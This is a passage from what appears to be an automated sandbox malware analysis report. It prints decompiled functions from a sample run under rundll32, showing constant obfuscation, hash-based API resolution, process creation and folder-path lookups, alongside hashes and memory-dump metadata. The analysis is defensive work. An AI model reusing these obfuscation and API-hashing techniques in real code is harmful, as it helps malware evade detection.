				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x36320c = _a4;
					if(E0034F8FD() != 0) {
						E003493ED(); // executed
					}
				}
				return 1;
			}

0x0034e997
0x0034e99d
0x0034e9a4
0x0034e9ab
0x0034e9b2
0x0034e9b9
0x0034e9c0
0x0034e9c7
0x0034e9d3
0x0034e9d8
0x0034e9dd
0x0034e9e1
0x0034e9e8
0x0034e9ef
0x0034e9f6
0x0034e9fd
0x0034ea02
0x0034ea07
0x0034ea0e
0x0034ea15
0x0034ea19
0x0034ea1a
0x0034ea1d
0x0034ea24
0x0034ea2f
0x0034ea32
0x0034ea39
0x0034ea40
0x0034ea47
0x0034ea53
0x0034ea56
0x0034ea5d
0x0034ea5d
0x0034ea60
0x0034ea65
0x0034ea77
0x0034ea88
0x0034ea8d
0x0034ea77
0x0034ea96

Strings

d,, xrefs: 0034E9AB
].u, xrefs: 0034EA15

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: ].u$d,
API String ID: 621844428-1507873175
Opcode ID: 77afcaec6238df84d1c6eab048d3fd21b549c78faf553e4380a273254a9437bc
Instruction ID: 3a57b3d2ee61de69c978e297f8b9fd38bef9e4247ee031d99943ae21736dffde
Opcode Fuzzy Hash: 77afcaec6238df84d1c6eab048d3fd21b549c78faf553e4380a273254a9437bc
Instruction Fuzzy Hash: 5F31F471D00209EBDB08DFA4C98A5DEBBF0FB54304F208499D510BB250D7B46B859F90

Uniqueness

Uniqueness Score: -1.00%

Function 0034AB87 Relevance: 1.4, Strings: 1, Instructions: 154
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0034AB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E003520B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E00344B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E00347F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E00351E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E00351E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}

0x0034ab88
0x0034ab94
0x0034ab97
0x0034ab9a
0x0034ab9d
0x0034ab9f
0x0034aba2
0x0034aba3
0x0034aba6
0x0034abaa
0x0034abab
0x0034abb0
0x0034abb6
0x0034abbd
0x0034abc4
0x0034abcb
0x0034abd2
0x0034abd6
0x0034abdd
0x0034abe4
0x0034abeb
0x0034abf2
0x0034abf9
0x0034ac00
0x0034ac09
0x0034ac0e
0x0034ac13
0x0034ac1a
0x0034ac21
0x0034ac28
0x0034ac2f
0x0034ac36
0x0034ac3d
0x0034ac44
0x0034ac4b
0x0034ac52
0x0034ac59
0x0034ac60
0x0034ac67
0x0034ac6e
0x0034ac75
0x0034ac79
0x0034ac80
0x0034ac87
0x0034ac8e
0x0034ac91
0x0034ac98
0x0034ac9f
0x0034aca3
0x0034acaa
0x0034acb1
0x0034acb8
0x0034acbc
0x0034acc3
0x0034acca
0x0034accd
0x0034acd4
0x0034acdb
0x0034ace2
0x0034ace9
0x0034aced
0x0034acf4
0x0034acfb
0x0034ad05
0x0034ad08
0x0034ad0b
0x0034ad16
0x0034ad19
0x0034ad20
0x0034ad2c
0x0034ad31
0x0034ad31
0x0034ad34
0x0034ad37
0x0034ad3e
0x0034ad45
0x0034ad4c
0x0034ad50
0x0034ad57
0x0034ad5a
0x0034ad5f
0x0034ad62
0x0034ad6a
0x0034ad6d
0x0034ad74
0x0034ad94
0x0034ad9e
0x0034addd
0x0034ada0
0x0034ada2
0x0034adbf
0x0034add3
0x0034ada4
0x0034ada7
0x0034ada8
0x0034ada9
0x0034adaa
0x0034adaa
0x0034adad
0x0034adad
0x0034ade5

Strings

nJQ, xrefs: 0034ABC4

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: nJQ
API String ID: 963392458-2884827605
Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
Instruction ID: 9075bf5a08e47d2f5ef3d368ef9129e393ffadfc7a25594eb53012727eda0bd7
Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
Instruction Fuzzy Hash: 2171F272400288EBCF59CFA4C9498CE3BA6FF48358F118119FE169A260D3B6D969DF45

Uniqueness

Uniqueness Score: -1.00%

Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 10006A9C

Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54

Uniqueness

Uniqueness Score: -1.00%

Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
GlobalHandle.KERNEL32(005F78E8), ref: 100208A9
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
GlobalHandle.KERNEL32(005F78E8), ref: 100208DB
GlobalLock.KERNEL32 ref: 100208E2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
GlobalLock.KERNEL32 ref: 100208F8
_memset.LIBCMT ref: 10020911
LeaveCriticalSection.KERNEL32(?), ref: 1002093D

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002FA87

Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1

___sbh_find_block.LIBCMT ref: 1002FA92
___sbh_free_block.LIBCMT ref: 1002FAA1
HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15

Uniqueness

Uniqueness Score: -1.00%

Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00347F5D Relevance: 1.6, APIs: 1, Instructions: 54
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0034AD99,?,?,?,181C8C04,0034AD99), ref: 00347FEB

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction ID: fbf67983393917745594736aa7b427ff104997983344730d111c4ee16f63df58
Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction Fuzzy Hash: 5111E872402118BBDF629F91DD09CDF7F79FF093A4F145144F91925121D3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003546BB Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E003546BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003520B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0035AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}

0x003546d5
0x003546da
0x003546e4
0x003546ec
0x003546f3
0x003546f7
0x003546fe
0x00354705
0x0035470c
0x00354724
0x00354735
0x0035473b

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00354735

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction ID: 4c0f825e9c88429e74c327cc0d5fdfe953104ced9f080d806b19b30e736b4ff1
Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction Fuzzy Hash: 86012C75802218BBCF15AFD5DC49CDFBFB8EF45394F108145F91826211D2758A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003493ED Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E003493ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0035AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}

0x003493f3
0x00349405
0x00349411
0x00349412
0x00349413
0x0034941a
0x00349421
0x00349428
0x00349433
0x00349436
0x0034943d
0x00349444
0x00349451
0x0034945b

APIs

ExitProcess.KERNELBASE(00000000), ref: 0034945B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction ID: 6f3a5d8d12707098f34528fca1c33da37cdc0cc9a26c577bec67023bfea31e30
Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction Fuzzy Hash: 6CF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91

Uniqueness

Uniqueness Score: -1.00%

Function 0034B23C Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0034B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003520B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
